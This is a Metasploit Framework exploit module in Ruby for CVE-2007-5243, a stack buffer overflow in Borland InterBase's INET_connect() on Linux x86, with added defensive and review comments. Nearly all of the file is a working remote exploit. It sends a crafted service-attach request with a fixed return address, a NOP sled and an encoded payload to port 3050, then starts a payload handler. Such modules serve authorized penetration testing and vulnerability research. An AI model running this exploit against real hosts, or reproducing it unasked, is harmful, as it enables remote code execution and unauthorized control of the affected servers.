rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/ib_inet_connect.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Remote exploit module for CVE-2007-5243, a stack buffer overflow in the
# Borland InterBase INET_connect() path reached through an oversized
# service-attach request on the InterBase listener (RPORT defaults to 3050).
# Only the Linux x86 builds named in 'Targets' are covered.
#
# Defensive context: the affected builds are LI-V8.0.0.53, LI-V8.0.0.54 and
# LI-V8.1.0.253; remediation is vendor patching and limiting exposure of the
# listener port to trusted hosts.  For triage, the request this module emits
# is an op_service_attach (opcode 82) whose attach string is followed by a
# 1024-byte "database parameter block" that is almost entirely NOP padding
# ahead of the payload (see #exploit).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Supplies connect/sock and the RHOST/RPORT options used by #exploit.
  include Msf::Exploit::Remote::Tcp

  # Declares module metadata (name, references, payload constraints, the
  # single target return address) and registers the RPORT option.
  #
  # @param info [Hash] caller-supplied overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Borland InterBase INET_connect() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Borland InterBase
          by sending a specially crafted service attach request.
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'Arch' => ARCH_X86,
        'Platform' => 'linux',
        'References' => [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38605' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
        # Module metadata: the payload is expected to run with the privileges
        # of the InterBase service process.
        'Privileged' => true,
        'License' => MSF_LICENSE,
        'Payload' => {
          # Caps the encoded payload at 512 bytes.  #exploit sizes its NOP
          # sled as 1024 - payload.encoded.length, so this cap is what keeps
          # that count non-negative (assumes the framework enforces Space).
          'Space' => 512,
          # NUL plus '/', ':', '@' and '\'.  ':' is the field separator the
          # request itself uses (see #exploit); the others are presumably
          # delimiters in the server-side attach-string parse — not verified
          # here.
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
        },
        'Targets' => [
          # 'Ret' is the address #exploit writes over the saved return pointer
          # (target.ret).  The hex after the address in the original comment
          # appears to record the instruction bytes at that location in the
          # listed builds; not re-verified here.
          # 0x0804d2ee 5b5e5f5dc3
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804d2ee }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-10-03',
        # Reliability, stability and side-effect ratings were never filled in
        # for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Only override: the InterBase listener port.
    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )
  end

  # Builds and sends the single malicious service-attach request, then hands
  # off to the payload handler.  Wire layout as assembled below (bytes):
  #
  #   opcode 82 (4, big-endian) | id 0 (4, big-endian) | length 161 (4, big-endian)
  #   attach string: 156 random alpha + 4-byte target.ret + ':'   (= 161)
  #   NUL padding up to a 4-byte boundary (3 bytes for length 161)
  #   dpb length 1024 (4, big-endian)
  #   dpb: NOP sled + payload.encoded, exactly 1024 bytes together
  #
  # Uses rand_text_alpha, make_nops, payload, target, sock and handler from
  # the framework mixins.  Nothing here reads or validates the server reply.
  def exploit
    # Opens the TCP socket to RHOST:RPORT (Msf::Exploit::Remote::Tcp).
    connect

    # Reference opcodes for the same protocol; only op_service_attach is
    # used below.

    # Attach database
    op_attach = 19

    # Create database
    op_create = 20

    # Service attach
    op_service_attach = 82

    # Declared size of the attach string.  The three pieces appended for it
    # below add up to exactly this: (length - 5) + 4 + 1.
    length = 161
    # Pad the attach string out to a multiple of 4 bytes (161 % 4 == 1, so
    # 3 NULs).
    remainder = length.remainder(4)
    padding = 0

    if remainder > 0
      padding = (4 - remainder)
    end

    # Mutable String; the '<<' appends below would raise under a
    # frozen_string_literal magic comment, so the file must not gain one.
    buf = ''

    # Operation/packet type
    buf << [op_service_attach].pack('N')

    # Id
    buf << [0].pack('N')

    # Length
    buf << [length].pack('N')

    # Random alpha data
    buf << rand_text_alpha(length - 5)

    # Target
    # NOTE(review): 'L' is a host-native-order 32-bit unsigned, unlike the
    # big-endian 'N' fields above, so the bytes emitted here depend on the
    # machine running the module.
    buf << [target.ret].pack('L')

    # Separator
    buf << ':'

    # Padding
    buf << "\x00" * padding

    # Database parameter block

    # Length
    buf << [1024].pack('N')

    # It will return into this nop block
    # Sled length plus the encoded payload fills the declared 1024 bytes;
    # the 512-byte 'Space' cap in initialize keeps this count non-negative.
    buf << make_nops(1024 - payload.encoded.length)

    # Payload
    buf << payload.encoded

    # Single write of the whole request; no response is read.
    sock.put(buf)

    # Runs the payload handler.  The socket is not explicitly disconnected
    # here.
    handler
  end
end